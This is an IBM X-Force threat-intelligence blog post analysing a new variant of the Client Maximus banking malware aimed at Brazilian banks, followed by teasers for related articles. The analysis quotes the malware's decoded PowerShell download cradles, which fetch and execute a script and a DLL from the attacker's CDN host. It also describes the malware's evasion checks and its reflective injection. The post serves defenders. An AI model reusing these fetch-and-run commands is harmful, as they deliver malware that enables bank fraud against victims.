In January 2017, IBM X-Force research reported the development of a new remote-access malware code targeting Brazilian banks. The malware, dubbed Client Maximus, was observed in ongoing campaigns and continues to target online banking users in the country. The development of Client Maximus, which is believed to be commercially available in Brazilian fraud and cybercrime communities, continues as new variants of the malware emerge.

IBM X-Force recently analyzed a new and upgraded version of the malware. Client Maximus appears to have been written specifically for attacks against Brazilian banks. Analysis of different components of this code led our researchers to the overall understanding of the growing sophistication of cybercrime tools in Brazil.

Read the white paper: Shifting the balance of power with cognitive fraud prevention

Initial Malware Download

The initial infection routine begins with an obfuscated LNK file that runs CMD.exe /c with PowerShell.exe as a parameter. PowerShell, in turn, gets its own parameter, a Base64-encoded script, which is immediately executed before it downloads another file from the attacker’s control server and executes it.

An interesting note about the initial LNK file being used by Client Maximus is that the complete Base64-encoded PowerShell script is not visible in the Windows user interface, even when clicking “Properties” on the file. It is only visible to a dedicated ShellLink parser or hex editor.

We decoded the PowerShell code from its Base64 format and received the following:

CleAr-HoST;iEX(NEW-oBjEcT nET.webClIEnT).DoWnLOaDSTRiNg(‘hxxps://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8MHVvRA%3D%3D%’)

Scroll to view full table

The resulting downloaded file is yet another obfuscated PowerShell script that fetches a .NET assembly named “Loader.” That element is dynamically loaded as follows:

$bytes = (New-Object Net.WebClient).DownloadData(“hxxps://1361227624.rsc.cdn77.org/v2/loader.dll”)

[Reflection.Assembly]::Load($bytes)

Scroll to view full table

The next step is the execution of what the malware’s developer named a “Go” method on the dynamically loaded assembly (see code in REF _Ref492900569 \h \* MERGEFORMAT Figure 1):

[Loader]::Go(“hxxps://1361227624.rsc.cdn77.org/v2/”,”CpWY”)

Scroll to view full table

The “Go” method performs the following checks on the environment as a means to evade discovery by unwanted parties and anti-malware tools:

  • Is the IP address inside the Brazilian IP range?
  • Scans for the presence of a number of security applications on the endpoint;
  • Creates random names for files and folders to be created; and
  • Downloads corresponding payload from control server to match either the 32-bit Windows machine or 64-bit version.

After the loader’s run, the original PowerShell script proceeds to create two files:

  1. A VB script file that will execute the payload once it is downloaded:
  2. A LNK file (shortcut) to execute the aforementioned VB script.

In the last step before the payload arrives, the PowerShell script executes the LNK file, which, in turn, executes the VBS file:

Start-Process $lnkFileName

Scroll to view full table

The Client Maximus Four-Part Payload

The malware’s payload itself comprises four randomly named files. On our sample during the analysis, those files came up as:

File names will vary between variants and machines, as the malware randomly prenames them before actual creation. Let’s have a look at what these components do.

WindowsAnytimeUpgradeResults.exe.config

This file contains only the .NET-supported runtimes for the associated executable file that carries the same name. It is of little value in that sense.

WindowsAnytimeUpgradeResults.exe

This file presents known .NET WinForm software for the legitimate encryption/decryption process of PowerShell scripts, usually by IT administrators. WinForm, or Windows Forms, is a graphical class library included as a part of the Microsoft .NET Framework that provides a platform to write rich client applications for desktop, laptop and tablet PCs. This specific instance is known as PShellExec. In the context of the malware’s operation, it is used to decrypt the heavily obfuscated PowerShell script, noted as 2620343c, using the Zebra Bank Structure (ZBS) file as an argument.

To make debugging more arduous, the malware’s developer ensured that the runtime obfuscation of strings and some junk code is multi-threaded.

2620343c.zbs

ZBS files are typically used for data structure input/output. This file is, in reality, .NET-emitted code saved as a compressed byte array and encoded in Base64. This assembly, called Scripter.exe, is also quite heavily obfuscated and is loaded at runtime by the first executable using Assembly.Load(byte[]) and MethodInfo.Invoke().

The output of WindowsAnytimeUpgradeResults.exe is an obfuscated PowerShell script that performs remote loading of a dynamic link library (DLL) into a remote process, practically replacing Windows Loader. This technique, called reflective PE injection, is part of the PowerSploit suite, which offers various other features, such as logon token exfiltration and persistence techniques.

This final PowerShell code creates a new cmd.exe process and uses the DLL above to inject its payload into the legitimate cmd.exe process:

The following diagram gives an overview of the infection routine applied by this new variant of the Client Maximus banking malware:

Logical Attack Flow on the Victim’s Side

Once the endpoint has been successfully infected with the malware, Client Maximus will continually monitor the user’s browsing activity. When the user tries to reach his or her bank’s website — if that bank is on the malware operator’s target list — Client Maximus will go into action.

The malware’s top-level modus operandi is simple, yet effective:

  • Upon detecting a matching bank site/application, it launches full-screen overlay images to block the victim’s access to the banking session he or she initiated in the browser. Those screens also communicate fake messages to the victim, using social engineering to keep them waiting while the fraudster initiates a remote-access session to take control of the endpoint.
  • Client Maximus leverages remote control capabilities to take over the victim’s device, allowing the attacker to attempt a fraudulent transaction from that trusted endpoint. Moreover, for cases where the victim uses an application, rather than a website, for banking activity, the attacker can access that application on the desktop, see virtual keyboard activity and monitor the user’s actions in real time.

Client Maximus’ modus operandi is not much different from previous malicious code categorized under the remote overlay family. The scheme appears in further detail in our previous blog about Client Maximus.

Brazilian Malware Escalating in Sophistication

In 2017, IBM X-Force is seeing an ongoing escalation of malware codes in Brazil. After collaboration with external parties, it appears that there has been a permanent step-up in sophistication of malware codes.

On top of frequently seeing new Client Maximus variants operated by different actors and the upgrade the malware has recently undergone, X-Force researchers also found a new code being propagated in Brazil. The code is named Vernon, and more information about the malware will be available in the coming week from IBM X-Force.

Banks wishing to protect their customers from evolving threats and cybercrime modus operandi are invited to learn more about IBM Trusteer advanced fraud protection.

Individuals looking for tips on protecting themselves from remote overlay malware and other banking Trojans are invited to read our tips page for staying safer on PC/mobile devices.

We worked with the following MD5 hashes for this blog:

Read the white paper: Shifting the balance of power with cognitive fraud prevention

More from Fraud Protection

Kronos Malware Reemerges with Increased Functionality

The Evolution of Kronos Malware The Kronos malware is believed to have originated from the leaked source code of the Zeus malware, which was sold on the Russian underground in 2011. Kronos continued to evolve and a new variant of Kronos emerged in 2014 and was reportedly sold on the darknet for approximately $7,000. Kronos is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims. After remaining…

How Security Teams Combat Disinformation and Misinformation

“A lie can travel halfway around the world while the truth is still putting on its shoes.” That popular quote is often attributed to Mark Twain. But since we're talking about misinformation and disinformation, you’ll be unsurprised to learn Twain never said that at all. In fact, no one knows who first strung those words together, but the idea that truth spreads slowly while lies spread quickly is at least several hundred years old. The “Twain” quote also serves to…

A View Into Web(View) Attacks in Android

James Kilner contributed to the technical editing of this blog. Nethanella Messer, Segev Fogel, Or Ben Nun and Liran Tiebloom contributed to the blog. Although in the PC realm it is common to see financial malware used in web attacks to commit fraud, in Android-based financial malware this is a new trend. Traditionally, financial malware in Android uses overlay techniques to steal victims’ credentials. In 2022, IBM Security Trusteer researchers discovered a new trend in financial mobile malware that targets…

New DOJ Team Focuses on Ransomware and Cryptocurrency Crime

While no security officer would rely on this alone, it’s good to know the U.S. Department of Justice is increasing efforts to fight cyber crime. According to a recent address in Munich by Deputy Attorney General Lisa Monaco, new efforts will focus on ransomware and cryptocurrency incidents. This makes sense since the X-Force Threat Intelligence Index 2022 named ransomware as the top attack type in 2021. What exactly is the DOJ doing to improve policing of cryptocurrency and other cyber…